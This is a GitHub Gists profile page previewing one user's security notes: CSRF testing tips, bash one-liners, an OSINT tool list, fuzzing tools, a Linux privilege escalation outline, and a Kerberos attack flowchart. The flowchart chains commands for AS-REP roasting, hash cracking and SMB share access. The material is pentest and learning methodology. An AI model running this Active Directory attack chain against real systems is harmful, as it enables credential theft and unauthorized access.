Skip to content

Instantly share code, notes, and snippets.

View abraidotti's full-sized avatar
🏠

Sandro Braidotti abraidotti

🏠
13 followers · 8 following
View GitHub Profile
@abraidotti
abraidotti / rhynorators-web-app-test-tips.md
Last active October 28, 2022 17:23
Rhynorator's Web app test tips

https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w

  1. How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is CSRF token tied to account? Session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.

  2. Is caching implemented?

@abraidotti
abraidotti / bash-one-liners.md
Created October 18, 2022 19:22
bash one liners

remove last (empty) character of a file:

sed -i 's/.$//' file

ping every line in a file

cat file | xargs -i% ping -c 1 %

ping every line in a file and extract and save the IPs

cat DOMAINS.txt | xargs -i{} timeout 2 ping -q -c 2 {} | awk -F'[()]' '/PING/{print $2}' | tee IPs.txt

sort uniques in a file and replace the file

@abraidotti
abraidotti / kerberos-hacking-v1.md
Last active February 26, 2022 15:35
Kerberos Hacking 
graph TD
    kerberos-hacking-v1
    1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
    A[is kerberos running? -- typically port 88] -->  B
    B[find Active Directory domain names] -->|enum4linux $IP| C
    C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
    D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
    E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
 F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
@abraidotti
abraidotti / 0xConda-linux-priv-esc.md
Last active February 28, 2022 06:20

0xConda's Linux Privilege Escalation mindmap

source 😽

Credential Access

  • reused passwords

  • credentials from configuration files

@abraidotti
abraidotti / 0xConda-linux-priv-esc
Created January 20, 2022 15:15
OxConda's Linux Privileg Escalation mind map
# 0xConda's Linux Privilege Escalation mindmap
## Credential Access
- reused passwords
- credentials from configuration files
- credentials from local db
@abraidotti
abraidotti / app_dev_101_with_sandro.md
Created September 2, 2020 19:12
App Development 101 with Sandro

App Development 101 with Sandro

preliminaries

  • how I look up everything I don't know

  • how I consume and create open-source software

  • how I set goals and don't burn out

@abraidotti
abraidotti / hacking_101_with_sandro.md
Last active September 2, 2020 16:25
Hacking 101 with Sandro

hacking 101

a couple different thought threads...

Concepts to learn first

http

ports

@abraidotti
abraidotti / osint_tools.md
Last active September 2, 2020 15:44
OSINT tools

Some common OSS OSINT tools

Pretty much built in to linux

whois

nslookup

dig

@abraidotti
abraidotti / app_fuzzing_tools.md
Last active March 25, 2024 19:34
Application Fuzzing Tools

Application Fuzzing Tools

Fuzzing is the act of testing software for vulnerabilities by injecting mutated or iterated data.

This gist mostly lists tools for web app fuzzing, but a couple for binary file fuzzing too.

Context

The general SOP for app fuzzing seems to be: recon, enumeration, then fuzzing

@abraidotti
abraidotti / ks-readme-template.md
Last active September 28, 2020 14:43
Kintyre README template